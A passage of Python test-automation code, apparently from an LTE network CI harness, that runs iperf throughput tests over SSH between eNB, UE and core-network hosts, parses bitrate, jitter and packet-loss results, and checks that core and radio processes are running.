statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
def Iperf_analyzeV2Server(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
if (not os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
return
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is None:
logging.debug('Iperf bandwidth Not Found!')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not compute Iperf bandwidth!')
return
else:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
server_file = open('iperf_server_' + self.testCase_id + '_' + device_id + '.log', 'r')
br_sum = 0.0
ji_sum = 0.0
pl_sum = 0
ps_sum = 0
row_idx = 0
for line in server_file.readlines():
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(?P<lostPack>[0-9]+)/ +(?P<sentPack>[0-9]+)', str(line))
if result is not None:
bitrate = result.group('bitrate')
jitter = result.group('jitter')
packetlost = result.group('lostPack')
packetsent = result.group('sentPack')
br = bitrate.split(' ')
ji = jitter.split(' ')
row_idx = row_idx + 1
curr_br = float(br[0])
pl_sum = pl_sum + int(packetlost)
ps_sum = ps_sum + int(packetsent)
if (br[1] == 'Kbits/sec'):
curr_br = curr_br * 1000
if (br[1] == 'Mbits/sec'):
curr_br = curr_br * 1000 * 1000
br_sum = curr_br + br_sum
ji_sum = float(ji[0]) + ji_sum
if (row_idx > 0):
br_sum = br_sum / row_idx
ji_sum = ji_sum / row_idx
br_loss = 100 * br_sum / req_bw
if (br_sum > 1000):
br_sum = br_sum / 1000
if (br_sum > 1000):
br_sum = br_sum / 1000
bitrate = '%.2f Mbits/sec' % br_sum
else:
bitrate = '%.2f Kbits/sec' % br_sum
else:
bitrate = '%.2f bits/sec' % br_sum
bitperf = '%.2f ' % br_loss
bitperf += '%'
jitter = '%.2f ms' % (ji_sum)
if (ps_sum > 0):
pl = float(100 * pl_sum / ps_sum)
packetloss = '%2.1f ' % (pl)
packetloss += '%'
else:
packetloss = 'unknown'
lock.acquire()
if (br_loss < 90):
statusQueue.put(1)
else:
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
req_msg = 'Req Bitrate : ' + req_bandwidth
bir_msg = 'Bitrate : ' + bitrate
brl_msg = 'Bitrate Perf: ' + bitperf
jit_msg = 'Jitter : ' + jitter
pal_msg = 'Packet Loss : ' + packetloss
statusQueue.put(req_msg + '\n' + bir_msg + '\n' + brl_msg + '\n' + jit_msg + '\n' + pal_msg + '\n')
logging.debug('\u001B[1;37;45m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;35m ' + req_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + bir_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + brl_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + jit_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + pal_msg + '\u001B[0m')
lock.release()
else:
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
server_file.close()
def Iperf_analyzeV3Output(self, lock, UE_IPAddress, device_id, statusQueue):
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?:|[0-9\.]+ ms +\d+\/\d+ \((?P<packetloss>[0-9\.]+)%\)) +(?:|receiver)\\\\r\\\\n(?:|\[ *\d+\] Sent \d+ datagrams)\\\\r\\\\niperf Done\.', str(self.ssh.before))
if result is None:
result = re.search('(?P<error>iperf: error - [a-zA-Z0-9 :]+)', str(self.ssh.before))
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
if result is not None:
logging.debug('\u001B[1;37;41m ' + result.group('error') + ' \u001B[0m')
statusQueue.put(result.group('error'))
else:
logging.debug('\u001B[1;37;41m Bitrate and/or Packet Loss Not Found! \u001B[0m')
statusQueue.put('Bitrate and/or Packet Loss Not Found!')
lock.release()
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
msg = 'Bitrate : ' + bitrate + '\n'
iperfStatus = True
if packetloss is not None:
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
msg += 'Packet Loss : ' + packetloss + '%\n'
if float(packetloss) > float(self.iperf_packetloss_threshold):
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
msg += 'Packet Loss too high!\n'
iperfStatus = False
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
def Iperf_UL_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
udpIperf = True
result = re.search('-u', str(self.iperf_args))
if result is None:
udpIperf = False
ipnumbers = UE_IPAddress.split('.')
if (len(ipnumbers) == 4):
ipnumbers[3] = '1'
EPC_Iperf_UE_IPAddress = ipnumbers[0] + '.' + ipnumbers[1] + '.' + ipnumbers[2] + '.' + ipnumbers[3]
# Launch iperf server on EPC side
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
port = 5001 + idx
if udpIperf:
self.command('echo $USER; nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
else:
self.command('echo $USER; nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
time.sleep(0.5)
self.close()
# Launch iperf client on UE
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
modified_options = modified_options.replace('-R','')
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (device_id == 'OAI-UE'):
iperf_status = self.command('iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + ' -B ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
iperf_status = self.command('stdbuf -o0 adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '" 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
# TIMEOUT Case
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill iperf server on EPC side
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('killall --signal SIGKILL iperf', self.EPCUserName, 5)
self.close()
# in case of failure, retrieve server log
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI-UE
if (device_id == 'OAI-UE'):
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_' + self.testCase_id + '_' + device_id + '.log', '.')
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
def Iperf_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
try:
# Single-UE profile -- iperf only on one UE
if self.iperf_profile == 'single-ue' and idx != 0:
return
useIperf3 = False
udpIperf = True
if (device_id != 'OAI-UE'):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# if by chance ADB server and EPC are on the same remote host, at least log collection will take care of it
self.command('if [ ! -d ' + self.EPCSourceCodePath + '/scripts ]; then mkdir -p ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
# Checking if iperf / iperf3 are installed
self.command('adb -s ' + device_id + ' shell "ls /data/local/tmp"', '\$', 5)
result = re.search('iperf3', str(self.ssh.before))
if result is None:
result = re.search('iperf', str(self.ssh.before))
if result is None:
message = 'Neither iperf nor iperf3 installed on UE!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
else:
useIperf3 = True
self.close()
# in case of iperf, UL has its own function
if (not useIperf3):
result = re.search('-R', str(self.iperf_args))
if result is not None:
self.Iperf_UL_common(lock, UE_IPAddress, device_id, idx, ue_num, statusQueue)
return
# Launch the IPERF server on the UE side for DL
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -u -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
if (useIperf3):
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/iperf3 -s &', '\$', 5)
else:
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
time.sleep(0.5)
self.close()
# Launch the IPERF client on the EPC side for DL
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (useIperf3):
self.command('stdbuf -o0 iperf3 -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
clientStatus = 0
self.Iperf_analyzeV3Output(lock, UE_IPAddress, device_id, statusQueue)
else:
iperf_status = self.command('stdbuf -o0 iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill the IPERF server that runs in background
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('killall iperf', '\$', 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
self.close()
# if the client report is absent, try to analyze the server log file
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
if (device_id == 'OAI-UE'):
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
else:
self.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI UE:
if (device_id == 'OAI-UE'):
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
pass
else:
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
def IperfNoS1(self):
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '' or self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
server_on_enb = re.search('-R', str(self.iperf_args))
if server_on_enb is not None:
iServerIPAddr = self.eNBIPAddress
iServerUser = self.eNBUserName
iServerPasswd = self.eNBPassword
iClientIPAddr = self.UEIPAddress
iClientUser = self.UEUserName
iClientPasswd = self.UEPassword
else:
iServerIPAddr = self.UEIPAddress
iServerUser = self.UEUserName
iServerPasswd = self.UEPassword
iClientIPAddr = self.eNBIPAddress
iClientUser = self.eNBUserName
iClientPasswd = self.eNBPassword
# Starting the iperf server
self.open(iServerIPAddr, iServerUser, iServerPasswd)
# args SHALL be "-c client -u any"
# -c 10.0.1.2 -u -b 1M -t 30 -i 1 -fm -B 10.0.1.1
# -B 10.0.1.1 -u -s -i 1 -fm
server_options = re.sub('-u.*$', '-u -s -i 1 -fm', str(self.iperf_args))
server_options = server_options.replace('-c','-B')
self.command('rm -f /tmp/tmp_iperf_server_' + self.testCase_id + '.log', '\$', 5)
self.command('echo $USER; nohup iperf ' + server_options + ' > /tmp/tmp_iperf_server_' + self.testCase_id + '.log 2>&1 &', iServerUser, 5)
time.sleep(0.5)
self.close()
# Starting the iperf client
modified_options = self.Iperf_ComputeModifiedBW(0, 1)
modified_options = modified_options.replace('-R','')
iperf_time = self.Iperf_ComputeTime()
self.open(iClientIPAddr, iClientUser, iClientPasswd)
self.command('rm -f /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', 5)
iperf_status = self.command('stdbuf -o0 iperf ' + modified_options + ' 2>&1 | stdbuf -o0 tee /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', int(iperf_time)*5.0)
status_queue = SimpleQueue()
lock = Lock()
if iperf_status < 0:
message = 'iperf on OAI UE crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
clientStatus = -2
else:
clientStatus = self.Iperf_analyzeV2Output(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
self.close()
# Stopping the iperf server
self.open(iServerIPAddr, iServerUser, iServerPasswd)
self.command('killall --signal SIGKILL iperf', '\$', 5)
time.sleep(0.5)
self.close()
if (clientStatus == -1):
if (os.path.isfile('iperf_server_' + self.testCase_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '.log')
self.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
self.Iperf_analyzeV2Server(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
# copying on the EPC server for logCollection
copyin_res = self.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_OAI-UE.log', self.EPCSourceCodePath + '/scripts')
copyin_res = self.copyin(iClientIPAddr, iClientUser, iClientPasswd, '/tmp/tmp_iperf_' + self.testCase_id + '.log', 'iperf_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_OAI-UE.log', self.EPCSourceCodePath + '/scripts')
iperf_noperf = False
if status_queue.empty():
iperf_status = False
else:
iperf_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def Iperf(self):
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is not None:
self.IperfNoS1()
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
ue_num = len(self.UEIPAddresses)
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = SSH.Iperf_common, args = (lock,UE_IPAddress,device_id,i,ue_num,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.iperf_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
iperf_status = True
iperf_noperf = False
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def CheckProcessExist(self, check_eNB, check_OAI_UE):
multi_jobs = []
status_queue = SimpleQueue()
# in noS1 config, no need to check status from EPC
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is None:
p = Process(target = SSH.CheckHSSProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckMMEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckSPGWProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
else:
if (check_eNB == False) and (check_OAI_UE == False):
return 0
if check_eNB:
p = Process(target = SSH.CheckeNBProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
if check_OAI_UE:
p = Process(target = SSH.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == ENB_PROCESS_FAILED:
fileCheck = re.search('enb_', str(self.eNBLogFiles[0]))
if fileCheck is not None:
self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + self.eNBLogFiles[0], '.')
logStatus = self.AnalyzeLogFile_eNB(self.eNBLogFiles[0])
if logStatus < 0:
result = logStatus
self.eNBLogFiles[0] = ''
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.TerminateFlexranCtrl()
return result
def CheckOAIUEProcessExist(self, initialize_OAI_UE_flag):
multi_jobs = []
status_queue = SimpleQueue()
if initialize_OAI_UE_flag == False:
p = Process(target = SSH.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == OAI_UE_PROCESS_FAILED:
fileCheck = re.search('ue_', str(self.UELogFile))
if fileCheck is not None:
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
if logStatus < 0:
result = logStatus
return result
def CheckOAIUEProcess(self, status_queue):
try:
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m OAI UE Process Not Found! \u001B[0m')
status_queue.put(OAI_UE_PROCESS_FAILED)
else:
status_queue.put(OAI_UE_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckeNBProcess(self, status_queue):
try:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m eNB Process Not Found! \u001B[0m')
status_queue.put(ENB_PROCESS_FAILED)
else:
status_queue.put(ENB_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckHSSProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never hss | grep -v grep', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
result = re.search('hss_sim s6as diam_hss', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m HSS Process Not Found! \u001B[0m')
status_queue.put(HSS_PROCESS_FAILED)
else:
status_queue.put(HSS_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckMMEProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never mme | grep -v grep', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
result = re.search('mme', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m MME Process Not Found! \u001B[0m')
status_queue.put(MME_PROCESS_FAILED)
else:
status_queue.put(MME_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckSPGWProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep --color=never spgw | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
self.command('stdbuf -o0 ps -aux | grep --color=never xGw | grep -v grep', '\$', 5)
result = re.search('xGw', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m SPGW Process Not Found! \u001B[0m')
status_queue.put(SPGW_PROCESS_FAILED)
else:
status_queue.put(SPGW_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AnalyzeLogFile_eNB(self, eNBlogFile):
if (not os.path.isfile('./' + eNBlogFile)):
return -1
enb_log_file = open('./' + eNBlogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
rrcSetupComplete = 0
rrcReleaseRequest = 0
rrcReconfigRequest = 0
rrcReconfigComplete = 0
rrcReestablishRequest = 0
rrcReestablishComplete = 0
rrcReestablishReject = 0
rlcDiscardBuffer = 0
rachCanceledProcedure = 0
uciStatMsgCount = 0
pdcpFailure = 0
ulschFailure = 0
cdrxActivationMessageCount = 0
dropNotEnoughRBs = 0
self.htmleNBFailureMsg = ''
isRRU = False
isSlave = False
slaveReceivesFrameResyncCmd = False
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_inNbProcedures = 0
X2HO_outNbProcedures = 0
for line in enb_log_file.readlines():
if X2HO_state == X2_HO_REQ_STATE__IDLE:
result = re.search('target eNB Receives X2 HO Req X2AP_HANDOVER_REQ', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_RECEIVES_REQ
result = re.search('source eNB receives the X2 HO ACK X2AP_HANDOVER_REQ_ACK', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK
if X2HO_state == X2_HO_REQ_STATE__TARGET_RECEIVES_REQ:
result = re.search('Received LTE_RRCConnectionReconfigurationComplete from UE', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE
if X2HO_state == X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE:
result = re.search('issue rrc_eNB_send_PATH_SWITCH_REQ', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ
if X2HO_state == X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ:
result = re.search('received path switch ack S1AP_PATH_SWITCH_REQ_ACK', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_inNbProcedures += 1
if X2HO_state == X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK:
result = re.search('source eNB receives the X2 UE CONTEXT RELEASE X2AP_UE_CONTEXT_RELEASE', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_outNbProcedures += 1
if self.eNBOptions[int(self.eNB_instance)] != '':
res1 = re.search('max_rxgain (?P<requested_option>[0-9]+)', self.eNBOptions[int(self.eNB_instance)])
res2 = re.search('max_rxgain (?P<applied_option>[0-9]+)', str(line))
